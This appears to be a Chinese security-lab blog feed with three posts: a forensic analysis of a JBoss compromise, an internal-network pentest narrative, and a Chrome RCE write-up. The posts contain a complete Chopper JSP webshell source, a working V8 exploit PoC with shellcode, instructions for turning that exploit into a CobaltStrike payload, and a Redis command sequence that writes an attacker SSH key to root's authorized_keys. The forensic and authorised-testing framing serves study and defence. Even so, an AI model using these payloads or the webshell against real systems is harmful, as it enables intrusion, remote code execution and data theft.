a=K&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fjboss-web.deployer%2FROOT.war&z2=2008-07-19+02%3A22%3A10将/usr/local/jboss/server/default/./deploy/jboss-web.deployer/ROOT.war的最后修改时间改为2008-07-19  02:22:10
a=K&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2FAugust.war&z2=2021-06-25+16%3A10%3A58将/usr/local/jboss/server/default/./deploy/management/August.war的最后修改时间改为2021-06-25  16:10:58
   
a=K&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2FAugust.war%2FAugust.jsp&z2=2021-06-25+16%3A10%3A58将/usr/local/jboss/server/default/./deploy/management/August.war/August.jsp的最后修改时间改为2021-06-25  16:10:58
a=K&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2FAugust.war%2Fshell.jsp&z2=2021-06-25+16%3A10%3A58将/usr/local/jboss/server/default/./deploy/management/August.war/shell.jsp的最后修改时间改为2021-06-25  16:10:58
a=M&z0=GB2312&z1=-c%2Fbin%2Fsh&z2=cd+%22%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2FAugust.war%2F%22%3Bps+aux%3Becho+%5BS%5D%3Bpwd%3Becho+%5BE%5D执行系统命令[ps aux]
a=C&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Flog%2Fserver.log读取/usr/local/jboss/server/default/./log/server.log
a=D&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Flog%2Fserver.log&z2=1将“1”写入/usr/local/jboss/server/default/./log/server.log
a=C&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Flog%2Fserver.log.2021-06-20读取/usr/local/jboss/server/default/./log/server.log.2021-06-20
a=F&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2Fconsole-mgr.sar%2Fweb-console.war%2FServerInfo.jsp下载/usr/local/jboss/server/default/./deploy/management/console-mgr.sar/web-console.war/ServerInfo.jsp
a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2Fconsole-mgr.sar%2Fweb-console.war%2FServerInfo.jsp删除/usr/local/jboss/server/default/./deploy/management/console-mgr.sar/web-console.war/ServerInfo.jsp
a=C&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2Fconsole-mgr.sar%2Fweb-console.war%2Findex.html读取/usr/local/jboss/server/default/./deploy/management/console-mgr.sar/web-console.war/index.html
a=F&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2Fconsole-mgr.sar%2Fweb-console.war%2Fimages%2Flogo.gif下载/usr/local/jboss/server/default/./deploy/management/console-mgr.sar/web-console.war/images/logo.gif
a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2Fconsole-mgr.sar%2Fweb-console.war%2Fimages%2Flogo.gif删除/usr/local/jboss/server/default/./deploy/management/console-mgr.sar/web-console.war/images/logo.gif
a=G&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2Fconsole-mgr.sar%2Fweb-console.war%2Fimages%2Flogo.gif&z2=474946383961E8036900F7000000...将16进制写入/usr/local/jboss/server/default/./deploy/management/console-mgr.sar/web-console.war/images/logo.gif
a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fjmx-console.war删除/usr/local/jboss/server/default/./deploy/jmx-console.war
a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fjboss-web.deployer%2FROOT.war删除/usr/local/jboss/server/default/./deploy/jboss-web.deployer/ROOT.war
a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2Fjbossjdk.war删除/usr/local/jboss/server/default/./deploy/management/jbossjdk.war
a=C&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log读取/usr/local/jboss/server/default/log/server.log
a=C&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log读取/usr/local/jboss/server/default/log/server.log
a=D&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log&z2=122将“122”写入/usr/local/jboss/server/default/log/server.log
a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log.2021-06-20删除/usr/local/jboss/server/default/log/server.log.2021-06-20
a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log.2021-06-21删除/usr/local/jboss/server/default/log/server.log.2021-06-21
a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log.2021-06-22删除/usr/local/jboss/server/default/log/server.log.2021-06-22
a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log.2021-06-23删除/usr/local/jboss/server/default/log/server.log.2021-06-23
a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log.2021-06-24删除/usr/local/jboss/server/default/log/server.log.2021-06-24
a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log.2021-06-25删除/usr/local/jboss/server/default/log/server.log.2021-06-25
a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log.2021-06-26删除/usr/local/jboss/server/default/log/server.log.2021-06-26
a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log.2021-06-27删除/usr/local/jboss/server/default/log/server.log.2021-06-27
a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log.2021-06-28删除/usr/local/jboss/server/default/log/server.log.2021-06-28
a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fwork%2Fjboss.web%2Flocalhost%2Fjbossjdk删除/usr/local/jboss/server/default/./work/jboss.web/localhost/jbossjdk
a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fwork%2Fjboss.web%2Flocalhost%2F_删除/usr/local/jboss/server/default/./work/jboss.web/localhost/_
a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fwork%2Fjboss.web%2Flocalhost%2FAugust删除/usr/local/jboss/server/default/./work/jboss.web/localhost/August
a=C&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Flog%2Fserver.log读取/usr/local/jboss/server/default/./log/server.log
a=D&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Flog%2Fserver.log&z2=12将“12”写入/usr/local/jboss/server/default/./log/server.log
a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2FAugust.war删除/usr/local/jboss/server/default/./deploy/management/August.war

看到到这里大家应该会知道有一个August.war存在过,然后shell.jsp在August目录下,那shell.jsp应该在这个war里面。那shell.jsp的内容是什么?

根据前面写August.jsp的请求包可以推测其功能就是写文件。我们也可以从流量中将其内容找出来。
wireshark中检索 http contains "August.war",查看第一条。

URL解码后:
/jmx-console//HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=August.war&argType=java.lang.String&&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=<%+if(request.getParameter("f")!=null)(new+java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());+%>&argType=boolean&arg4=True

根据该url,Google查一下就知道攻击者这是利用的什么漏洞,其中arg3就是shell.jsp的内容。

至此,整个攻击的来龙去脉都理得清清楚楚,从什么漏洞进去,如何替换图片,然后删除webshell清除日志……



还原被篡改的文件


被篡改的源文件已被删除,可从流量中还原。根据之前分析的菜刀参数,查找的流量包可检索http contains "a=F" and http contains "logo.gif"到下载图片的数据包。

进一步检索http contains "->|GIF89a" and http.response,复制-> as a Hex Stream。

然后你可以将其粘贴到UE或者winHex等16进制编辑器。这里介绍另一种方法,粘贴到txt,删除2d3e7c(->|)及以前的内容和7c3c2d(|<-)及之后的内容。

使用如下代码转换成二进制文件:
import sys
if len(sys.argv)==2:    try:        f=open(sys.argv[1],'r')        hexString=f.read()        f.close()        b=bytes.fromhex(hexString)        nf=open('newfile','wb')        nf.write(b)        nf.close()    except Exception as e:        print(e)else:    print('need a path of text file!')
使用pyinsyaller打包成exe就更方便了,将txt拖到exe上面即可转换生成二进制文件。


附录:菜刀马解析备注


<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%><%!  String Pwd = "a";  String cs = "UTF-8";
  String EC(String s) throws Exception {    return new String(s.getBytes("ISO-8859-1"),cs);  }
  Connection GC(String s) throws Exception {    String[] x = s.trim().split("\r\n");    Class.forName(x[0].trim());    if(x[1].indexOf("jdbc:oracle")!=-1){      return DriverManager.getConnection(x[1].trim()+":"+x[4],x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);    }else{      Connection c = DriverManager.getConnection(x[1].trim(),x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);      if (x.length > 4) {        c.setCatalog(x[4]);      }      return c;    }  }  //列出根目录  void AA(StringBuffer sb) throws Exception {    File r[] = File.listRoots();    for (int i = 0; i < r.length; i++) {      sb.append(r[i].toString().substring(0, 2));    }  }  //列出指定目录文件  void BB(String s, StringBuffer sb) throws Exception {    File oF = new File(s), l[] = oF.listFiles();    String sT, sQ, sF = "";    java.util.Date dt;    SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");    for (int i = 0; i < l.length; i++) {      dt = new java.util.Date(l[i].lastModified());      sT = fm.format(dt);      sQ = l[i].canRead() ? "R" : "";      sQ += l[i].canWrite() ? " W" : "";      if (l[i].isDirectory()) {        sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length()+ "\t" + sQ + "\n");      } else {        sF+=l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t"+ sQ + "\n";      }    }    sb.append(sF);  }  //删除文件或文件夹  void EE(String s) throws Exception {    File f = new File(s);    if (f.isDirectory()) {      File x[] = f.listFiles();      for (int k = 0; k < x.length; k++) {        if (!x[k].delete()) {          EE(x[k].getPath());        }      }    }    f.delete();  }  //下载文件  void FF(String s, HttpServletResponse r) throws Exception {    int n;    byte[] b = new byte[512];    r.reset();    ServletOutputStream os = r.getOutputStream();    BufferedInputStream is = new BufferedInputStream(new FileInputStream(s));    os.write(("->" + "|").getBytes(), 0, 3);    while ((n = is.read(b, 0, 512)) != -1) {      os.write(b, 0, n);    }    os.write(("|" + "<-").getBytes(), 0, 3);    os.close();    is.close();  }  //将16进制字符串写为文件  void GG(String s, String d) throws Exception {    String h = "0123456789ABCDEF";    File f = new File(s);    f.createNewFile();    FileOutputStream os = new FileOutputStream(f);    for (int i = 0; i < d.length(); i += 2) {      os.write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d.charAt(i + 1))));    }    os.close();  }  //二进制文件复制  void HH(String s, String d) throws Exception {    File sf = new File(s), df = new File(d);    if (sf.isDirectory()) {      if (!df.exists()) {        df.mkdir();      }      File z[] = sf.listFiles();      for (int j = 0; j < z.length; j++) {        HH(s + "/" + z[j].getName(), d + "/" + z[j].getName());      }    } else {      FileInputStream is = new FileInputStream(sf);      FileOutputStream os = new FileOutputStream(df);      int n;      byte[] b = new byte[512];      while ((n = is.read(b, 0, 512)) != -1) {        os.write(b, 0, n);      }      is.close();      os.close();    }  }  //文件重命名  void II(String s, String d) throws Exception {    File sf = new File(s), df = new File(d);    sf.renameTo(df);  }  //创建文件夹  void JJ(String s) throws Exception {    File f = new File(s);    f.mkdir();  }  //修改时间戳  void KK(String s, String t) throws Exception {    File f = new File(s);    SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");    java.util.Date dt = fm.parse(t);    f.setLastModified(dt.getTime());  }  //从指定链接下载文件  void LL(String s, String d) throws Exception {    URL u = new URL(s);    int n = 0;    FileOutputStream os = new FileOutputStream(d);    HttpURLConnection h = (HttpURLConnection) u.openConnection();    InputStream is = h.getInputStream();    byte[] b = new byte[512];    while ((n = is.read(b)) != -1) {      os.write(b, 0, n);    }    os.close();    is.close();    h.disconnect();  }  //读取命令执行结果  void MM(InputStream is, StringBuffer sb) throws Exception {    String l;    BufferedReader br = new BufferedReader(new InputStreamReader(is));    while ((l = br.readLine()) != null) {      sb.append(l + "\r\n");    }  }  //连接数据库  void NN(String s, StringBuffer sb) throws Exception {    Connection c = GC(s);    ResultSet r = s.indexOf("jdbc:oracle")!=-1?c.getMetaData().getSchemas():c.getMetaData().getCatalogs();    while (r.next()) {      sb.append(r.getString(1) + "\t");    }    r.close();    c.close();  }  //创建数据库表  void OO(String s, StringBuffer sb) throws Exception {    Connection c = GC(s);    String[] x = s.trim().split("\r\n");    ResultSet r = c.getMetaData().getTables(null,s.indexOf("jdbc:oracle")!=-1?x.length>5?x[5]:x[4]:null, "%", new String[]{"TABLE"});    while (r.next()) {      sb.append(r.getString("TABLE_NAME") + "\t");    }    r.close();    c.close();  }  //读取数据库列  void PP(String s, StringBuffer sb) throws Exception {    String[] x = s.trim().split("\r\n");    Connection c = GC(s);    Statement m = c.createStatement(1005, 1007);    ResultSet r = m.executeQuery("select * from " + x[x.length-1]);    ResultSetMetaData d = r.getMetaData();    for (int i = 1; i <= d.getColumnCount(); i++) {      sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i)+ ")\t");    }    r.close();    m.close();    c.close();  }  //读取数据库数据  void QQ(String cs, String s, String q, StringBuffer sb,String p) throws Exception {    Connection c = GC(s);    Statement m = c.createStatement(1005, 1008);    BufferedWriter bw = null;    try {      ResultSet r = m.executeQuery(q.indexOf("--f:")!=-1?q.substring(0,q.indexOf("--f:")):q);      ResultSetMetaData d = r.getMetaData();      int n = d.getColumnCount();      for (int i = 1; i <= n; i++) {        sb.append(d.getColumnName(i) + "\t|\t");      }      sb.append("\r\n");      if(q.indexOf("--f:")!=-1){        File file = new File(p);        if(q.indexOf("-to:")==-1){          file.mkdir();        }        bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(q.indexOf("-to:")!=-1?p.trim():p+q.substring(q.indexOf("--f:") + 4,q.length()).trim()),true),cs));      }      while (r.next()) {        for (int i = 1; i <= n; i++) {          if(q.indexOf("--f:")!=-1){            bw.write(r.getObject(i)+""+"\t");            bw.flush();          }else{            sb.append(r.getObject(i)+"" + "\t|\t");          }        }        if(bw!=null){bw.newLine();}        sb.append("\r\n");      }      r.close();      if(bw!=null){bw.close();}    } catch (Exception e) {      sb.append("Result\t|\t\r\n");      try {        m.executeUpdate(q);        sb.append("Execute Successfully!\t|\t\r\n");      } catch (Exception ee) {        sb.append(ee.toString() + "\t|\t\r\n");      }    }    m.close();    c.close();  }%><%  cs = request.getParameter("z0") != null ? request.getParameter("z0")+ "":cs;  response.setContentType("text/html");  response.setCharacterEncoding(cs);  StringBuffer sb = new StringBuffer("");  try {    String Z = EC(request.getParameter(Pwd) + "");    String z1 = EC(request.getParameter("z1") + "");    String z2 = EC(request.getParameter("z2") + "");    sb.append("->" + "|");    String s = request.getSession().getServletContext().getRealPath("/");    if (Z.equals("A")) {      sb.append(s + "\t");      if (!s.substring(0, 1).equals("/")) {        AA(sb);      }    } else if (Z.equals("B")) {      BB(z1, sb);    } else if (Z.equals("C")) {//读取文本文件      String l = "";      BufferedReader br = new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));      while ((l = br.readLine()) != null) {        sb.append(l + "\r\n");      }      br.close();    } else if (Z.equals("D")) {//写入文本文件      BufferedWriter bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));      bw.write(z2);      bw.close();      sb.append("1");    } else if (Z.equals("E")) {      EE(z1);      sb.append("1");    } else if (Z.equals("F")) {      FF(z1, response);    } else if (Z.equals("G")) {      GG(z1, z2);      sb.append("1");    } else if (Z.equals("H")) {      HH(z1, z2);      sb.append("1");    } else if (Z.equals("I")) {      II(z1, z2);      sb.append("1");    } else if (Z.equals("J")) {      JJ(z1);      sb.append("1");    } else if (Z.equals("K")) {      KK(z1, z2);      sb.append("1");    } else if (Z.equals("L")) {      LL(z1, z2);      sb.append("1");    } else if (Z.equals("M")) {      String[] c = { z1.substring(2), z1.substring(0, 2), z2 };      Process p = Runtime.getRuntime().exec(c);      MM(p.getInputStream(), sb);      MM(p.getErrorStream(), sb);    } else if (Z.equals("N")) {      NN(z1, sb);    } else if (Z.equals("O")) {      OO(z1, sb);    } else if (Z.equals("P")) {      PP(z1, sb);    } else if (Z.equals("Q")) {      QQ(cs, z1, z2, sb,z2.indexOf("-to:")!=-1?z2.substring(z2.indexOf("-to:")+4,z2.length()):s.replaceAll("\\\\", "/")+"images/");    }  } catch (Exception e) {    sb.append("ERROR" + ":// " + e.toString());  }  sb.append("|" + "<-");  out.print(sb.toString());%>



InBug-实验室


网:https://www.inbug.org/

InScan内网扫描器:https://github.com/inbug-team/InScan


阅读原文

跳转微信打开

]]> Fri, 02 Jul 2021 18:30:00 +0800 一次 Shiro 到内网漫游横向渗透 https://mp.weixin.qq.com/s?__biz=Mzg2NjYwMTk0MA==&mid=2247483826&idx=1&sn=6a005a7b149646d20323b1c338d4d216 一次 Shiro 到内网漫游横向渗透 原创 InBug实验室 2021-06-30 18:11

一次 Shiro 到内网漫游横向渗透

前言


首先是通过 Shiro 拿到了一台 root:


通过 InScan 看了看内网发现还挺大:

由于当前跳板是出网机器,可以直接通过 wget 下载 frp 到本地:

随即通过 socks5 代理把他内网流量代理出来:

然后反弹了一个 shell 到 msf:(为了方便后续操作)


横向渗透


通过 Inscan 对内网的 WEB 进行探测找到了一个 tomcat 弱口令,通过部署 war 包拿到了 webshell:

通过 tasklist /svc 发现有 360 全家桶:


随后上传了一个冰蝎马:

通过实验室的小伙伴做了免杀上线到 CobaltStrike:

通过 mimikatz 成功抓到 administrator 密码和其他用户的 hash:

WIN-xxxx6V5B45T\Administrator xxxx@1234WIN-xxxx6V5B45T\xxxx xxxx828302eee5d159a17ce186b0dbf1WIN-xxxx6V5B45T\Administrator xxxx828302eee5d159a17ce186b0dbf1WIN-xxxx6V5B45T\xxxxis xxxx@1234WIN-xxxx6V5B45T\Administrator xxxx8c1e2a750d98cff13ef32e0a1ce0

随即通过添加了一个超级管理员用户 asp.net :qwe123.. 方便进远程桌面:

随即克隆了一个 administrator 用户到当前用户:

之后通过 Inscan 扫描出来一台 Mssql 弱口令成功登陆到该数据库:

经尝试 xp_cmdshell、sp_oacreatesp_oamethod ... 等等都不能利用:


到这里的时候回头看 Inscan 扫描结果,发现有几台 Redis 未授权:

Redis:x.xx.10.43:6379 Redis:x.xx.10.102:6379 Redis:x.xx.10.96:6379

针对于 Linux 的 Redis 可以直接写计划任务反弹 Shell:

随后 VPS 监听得到 Shell:

这是一种方式,还可以通过写公钥直接登陆!首先是在本地生成了一个公钥:


然后吧公钥写进计划任务里:(记得要加两个 \n )

set x "\n\nssh-rsa 这里是你的公钥\n\n"config set dir /root/.ssh/config set dbfilename authorized_keyssave

然后本机 VPS 就可以直接连接它的那台 redis 机器:

之后通过分析这台机器的管理员的习惯,发现了他的密码:

通过此密码成功横向拿到 x.xx.10.102 的 root :

之后通过 inScan 扫描四个网段的大 B 段:x.xx.1.1/16、xx.x.0.0/16,192.168.1.1/16,172.16.1.1/16 发现有很多存活主机:

等待了一天后,第二天发现已经扫描完毕:

由于那台跳板机器没有 chrome 浏览器,所以没能截图:

通过 InScan 扫描出来的 MS17010  成功拿下内网 x.xx.10.50 :

之后通过开启了它的 3389 :

run post/windows/manage/enable_rdp

然后添加了一个用户:asp.net

随即克隆成 administrator 用户:

由于当前机器是不出网的,排查是 DNS 的问题,随即改了他的 DNS 为 8.8.8.8 就能出网了:

随即上线到 CS:

之后提权到 SYSTEM 成功抓到 Administrator 的密码:

WIN-xxxxF42860A\Administrator xxxx@WSXWIN-xxxxF42860A\Administrator xxxxfe596a5db81874498a24

拿到密码后通过得到的密码去横向爆破,又拿到了一些机器:

针对于 Windows 的可以直接登陆远程桌面或者 Psexec 直接获取一个 Meterpreter :

对于 Linux 可以直接登陆目标 SSH:

弄到这里的时候客户叫停,至此不再深入,本次渗透测试到此为止!


InBug-实验室


官网:https://www.inbug.org/

InScan内网扫描器:https://github.com/inbug-team/InScan

阅读原文

跳转微信打开

]]> Wed, 30 Jun 2021 18:11:00 +0800 XSS + Chrome Rce = 上线到CobaltStrike https://mp.weixin.qq.com/s?__biz=Mzg2NjYwMTk0MA==&mid=2247483747&idx=1&sn=98f0a96c8412a8d94d0b69b7461d1ed8 最近 Google Chrome 浏览器被爆出存在远程代码执行漏洞(CNVD-2021-27989),攻击者只需要构造一个恶意的 html 页面诱导用户点击访问,就能实现对浏览器的远程代码执行攻击。 原创 InBug实验室 2021-04-17 12:32

最近 Google Chrome 浏览器被爆出存在远程代码执行漏洞(CNVD-2021-27989),攻击者只需要构造一个恶意的 html 页面诱导用户点击访问,就能实现对浏览器的远程代码执行攻击。

前言


最近 Google Chrome 浏览器被爆出存在远程代码执行漏洞(CNVD-2021-27989),攻击者只需要构造一个恶意的 html 页面诱导用户点击访问,就能实现对浏览器的远程代码执行攻击。但是攻击者单独利用该漏洞无法实现沙盒(SandBox)逃逸。沙盒是 Google Chrome 浏览器的安全边界,防止恶意攻击代码破坏用户系统或者浏览器其他页面。Google Chrome 浏览器默认开启沙盒保护模式。


漏洞影响范围:Google Chrome < = 89.0.4389.114。


点击链接打开记事本


该 Poc 来自于网络:

<script>   function gc() {       for (var i = 0; i < 0x80000; ++i) {           var a = new ArrayBuffer();      }  }   let shellcode = [0xFC, 0x48, 0x83, 0xE4, 0xF0, 0xE8, 0xC0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,       0x56, 0x48, 0x31, 0xD2, 0x65, 0x48, 0x8B, 0x52, 0x60, 0x48, 0x8B, 0x52, 0x18, 0x48, 0x8B, 0x52,       0x20, 0x48, 0x8B, 0x72, 0x50, 0x48, 0x0F, 0xB7, 0x4A, 0x4A, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0,       0xAC, 0x3C, 0x61, 0x7C, 0x02, 0x2C, 0x20, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1, 0xE2, 0xED,       0x52, 0x41, 0x51, 0x48, 0x8B, 0x52, 0x20, 0x8B, 0x42, 0x3C, 0x48, 0x01, 0xD0, 0x8B, 0x80, 0x88,       0x00, 0x00, 0x00, 0x48, 0x85, 0xC0, 0x74, 0x67, 0x48, 0x01, 0xD0, 0x50, 0x8B, 0x48, 0x18, 0x44,       0x8B, 0x40, 0x20, 0x49, 0x01, 0xD0, 0xE3, 0x56, 0x48, 0xFF, 0xC9, 0x41, 0x8B, 0x34, 0x88, 0x48,       0x01, 0xD6, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0, 0xAC, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1,       0x38, 0xE0, 0x75, 0xF1, 0x4C, 0x03, 0x4C, 0x24, 0x08, 0x45, 0x39, 0xD1, 0x75, 0xD8, 0x58, 0x44,       0x8B, 0x40, 0x24, 0x49, 0x01, 0xD0, 0x66, 0x41, 0x8B, 0x0C, 0x48, 0x44, 0x8B, 0x40, 0x1C, 0x49,       0x01, 0xD0, 0x41, 0x8B, 0x04, 0x88, 0x48, 0x01, 0xD0, 0x41, 0x58, 0x41, 0x58, 0x5E, 0x59, 0x5A,       0x41, 0x58, 0x41, 0x59, 0x41, 0x5A, 0x48, 0x83, 0xEC, 0x20, 0x41, 0x52, 0xFF, 0xE0, 0x58, 0x41,       0x59, 0x5A, 0x48, 0x8B, 0x12, 0xE9, 0x57, 0xFF, 0xFF, 0xFF, 0x5D, 0x48, 0xBA, 0x01, 0x00, 0x00,       0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x8D, 0x01, 0x01, 0x00, 0x00, 0x41, 0xBA, 0x31, 0x8B,       0x6F, 0x87, 0xFF, 0xD5, 0xBB, 0xF0, 0xB5, 0xA2, 0x56, 0x41, 0xBA, 0xA6, 0x95, 0xBD, 0x9D, 0xFF,       0xD5, 0x48, 0x83, 0xC4, 0x28, 0x3C, 0x06, 0x7C, 0x0A, 0x80, 0xFB, 0xE0, 0x75, 0x05, 0xBB, 0x47,       0x13, 0x72, 0x6F, 0x6A, 0x00, 0x59, 0x41, 0x89, 0xDA, 0xFF, 0xD5, 0x6E, 0x6F, 0x74, 0x65, 0x70,       0x61, 0x64, 0x2E, 0x65, 0x78, 0x65, 0x00];   var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]);   var wasmModule = new WebAssembly.Module(wasmCode);   var wasmInstance = new WebAssembly.Instance(wasmModule);   var main = wasmInstance.exports.main;   var bf = new ArrayBuffer(8);   var bfView = new DataView(bf);   function fLow(f) {       bfView.setFloat64(0, f, true);       return (bfView.getUint32(0, true));  }   function fHi(f) {       bfView.setFloat64(0, f, true);       return (bfView.getUint32(4, true))  }   function i2f(low, hi) {       bfView.setUint32(0, low, true);       bfView.setUint32(4, hi, true);       return bfView.getFloat64(0, true);  }   function f2big(f) {       bfView.setFloat64(0, f, true);       return bfView.getBigUint64(0, true);  }   function big2f(b) {       bfView.setBigUint64(0, b, true);       return bfView.getFloat64(0, true);  }   class LeakArrayBuffer extends ArrayBuffer {       constructor(size) {           super(size);           this.slot = 0xb33f;      }  }   function foo(a) {       let x = -1;       if (a) x = 0xFFFFFFFF;       var arr = new Array(Math.sign(0 - Math.max(0, x, -1)));       arr.shift();       let local_arr = Array(2);       local_arr[0] = 5.1;//4014666666666666       let buff = new LeakArrayBuffer(0x1000);//byteLength idx=8       arr[0] = 0x1122;       return [arr, local_arr, buff];  }   for (var i = 0; i < 0x10000; ++i)       foo(false);   gc(); gc();  [corrput_arr, rwarr, corrupt_buff] = foo(true);   corrput_arr[12] = 0x22444;   delete corrput_arr;   function setbackingStore(hi, low) {       rwarr[4] = i2f(fLow(rwarr[4]), hi);       rwarr[5] = i2f(low, fHi(rwarr[5]));  }   function leakObjLow(o) {       corrupt_buff.slot = o;       return (fLow(rwarr[9]) - 1);  }   let corrupt_view = new DataView(corrupt_buff);   let corrupt_buffer_ptr_low = leakObjLow(corrupt_buff);   let idx0Addr = corrupt_buffer_ptr_low - 0x10;   let baseAddr = (corrupt_buffer_ptr_low & 0xffff0000) - ((corrupt_buffer_ptr_low & 0xffff0000) % 0x40000) + 0x40000;   let delta = baseAddr + 0x1c - idx0Addr;   if ((delta % 8) == 0) {       let baseIdx = delta / 8;       this.base = fLow(rwarr[baseIdx]);  } else {       let baseIdx = ((delta - (delta % 8)) / 8);       this.base = fHi(rwarr[baseIdx]);  }   let wasmInsAddr = leakObjLow(wasmInstance);   setbackingStore(wasmInsAddr, this.base);   let code_entry = corrupt_view.getFloat64(13 * 8, true);   setbackingStore(fLow(code_entry), fHi(code_entry));   for (let i = 0; i < shellcode.length; i++) {       corrupt_view.setUint8(i, shellcode[i]);  }   main();</script>

手动打开 Chrome 的时候关闭沙箱然后打开 poc.html 即可弹出记事本:

chrome.exe -no-sandbox




点击链接上线到 CobaltStrike


首先通过 CobaltStrike 开启一个监听器,我这边选择的是 http:

之后生成一个 C 的 shellcode(x64):

之后把生成的 Poc 中的 shellcode,\ 替换为 ,0  :

替换前:

替换后:


之后把 shellcode 替换到第七行里:

